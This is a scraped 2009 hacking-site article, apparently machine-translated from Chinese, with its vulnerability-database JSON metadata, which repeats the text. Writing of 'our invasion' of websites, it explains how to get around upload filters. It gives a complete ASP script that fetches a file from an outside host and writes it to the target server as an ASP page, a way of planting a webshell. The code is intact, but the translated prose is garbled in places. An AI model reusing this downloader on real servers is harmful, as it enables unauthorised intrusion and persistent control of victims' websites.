Breakthrough class to intercept the upload limit-vulnerability warning-the black bar safety net
2009-07-05T00:00:00
ID MYHACK58:62200923735 Type myhack58 Reporter 佚名 Modified 2009-07-05T00:00:00
Description
by:Prius special
In our invasion of the site,sometimes submitted to our Malaysian or other ASP file,will be first-class information surveillance system The intercept,this is because it set a limit to submit a character,since it does not allow us to submit,that we can use the download method. This is like we Upload a large EXE file,the site prohibits the uploading,but we can use an external way to download to the target file downloaded to the local server. Well,this method is,as long as the server did not disable the XML and data flow components,we can to the server to submit the following ASP script file
<%
Set xPost = CreateObject("Microsoft. XMLHTTP")
xPost. Open "GET","http://www.hacksb.cn/1.txt",, False
xPost. Send()
Set sGet = CreateObject("ADODB. Stream")
sGet. Mode = 3
sGet. Type = 1
sGet. Open()
sGet. Write(xPost. responseBody)
sGet. SaveToFile Server. MapPath("1. asp"),2
set sGet = nothing
set sPOST = nothing
%>
{"type": "myhack58", "edition": 1, "title": "Breakthrough class to intercept the upload limit-vulnerability warning-the black bar safety net", "hashmap": [{"key": "bulletinFamily", "hash": "caf9b6b99962bf5c2264824231d7a40c"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "62c4cc9038614fc132c642dc459d6573"}, {"key": "href", "hash": "e5d836386cbb645f5df773e5985f5582"}, {"key": "modified", "hash": "cc3a91c347ce7ebb48785128cdf52f82"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "cc3a91c347ce7ebb48785128cdf52f82"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "645396391020478112635e14b34a0f8b"}, {"key": "title", "hash": "7b4f815ee782fa7428e4df3db35ebfb3"}, {"key": "type", "hash": "0665a8b0792e65b50ab13aef58a018dc"}], "references": [], "bulletinFamily": "info", "published": "2009-07-05T00:00:00", "lastseen": "2016-11-08T21:27:15", "history": [], "modified": "2009-07-05T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2009/23735.htm", "hash": "5bf1d48929a59d87ce5d4b97291107f1d0f68555232500274185e7d73f1a1aa7", "viewCount": 0, "objectVersion": "1.2", "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": -0.8, "vector": "NONE", "modified": "2016-11-08T21:27:15"}, "dependencies": {"references": [], "modified": "2016-11-08T21:27:15"}, "vulnersScore": -0.8}, "cvelist": [], "id": "MYHACK58:62200923735", "description": "by:Prius special \nIn our invasion of the site,sometimes submitted to our Malaysian or other ASP file,will be first-class information surveillance system The intercept,this is because it set a limit to submit a character,since it does not allow us to submit,that we can use the download method. This is like we Upload a large EXE file,the site prohibits the uploading,but we can use an external way to download to the target file downloaded to the local server. Well,this method is,as long as the server did not disable the XML and data flow components,we can to the server to submit the following ASP script file \n<% \nSet xPost = CreateObject(\"Microsoft. XMLHTTP\") \nxPost. Open \"GET\",\"http://www.hacksb.cn/1.txt\",, False \nxPost. Send() \nSet sGet = CreateObject(\"ADODB. Stream\") \nsGet. Mode = 3 \nsGet. Type = 1 \nsGet. Open() \nsGet. Write(xPost. responseBody) \nsGet. SaveToFile Server. MapPath(\"1. asp\"),2 \nset sGet = nothing \nset sPOST = nothing \n%>\n\n\n\n"}
